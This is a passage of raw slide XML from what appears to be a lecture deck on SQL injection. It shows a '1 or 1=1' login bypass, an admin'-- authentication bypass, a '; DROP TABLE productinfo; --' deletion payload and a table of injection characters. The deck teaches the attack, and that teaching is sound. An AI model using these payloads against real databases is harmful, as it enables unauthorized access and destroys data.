              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>formpas</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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Final query would look like this:</a:t>
            </a:r>
            <a:endPar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742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>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SELECT * FROM clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>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WHERE user= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1 or 1=1;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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endPar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742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AND pas = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1111</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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34</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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143000" y="76200"/>
            <a:ext cx="7315200" cy="838200"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Examples of what can SQL Injection do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="8229600" cy="4754563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Delete: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Select productinfo from table where productname = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>whatever’; DROP TABLE productinfo; -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bypass Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Select * from users where username=’user ’ and password=’passwd ’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>select * from users where username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’--’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and password=’whocares’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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43000" y="228600"/>
            <a:ext cx="6172200"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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL Injection Characters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="4830763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>character </a:t>
            </a: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String Indicators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-- or #  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	single-line </a:t>
            </a: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comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/*…*/ </a:t>
            </a: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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	multiple-line </a:t>
            </a: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comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>+	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	addition</a:t>
            </a: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concatenate (or space in </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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url</a:t>
            </a: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t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>||</a:t>
            </a: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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	(</a:t>
            </a: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double pipe) concatenate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>%	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	wildcard </a:t>
            </a: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attribute indicator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>?Param1=foo&amp;Param2=bar    </a:t>
            </a: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URL Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
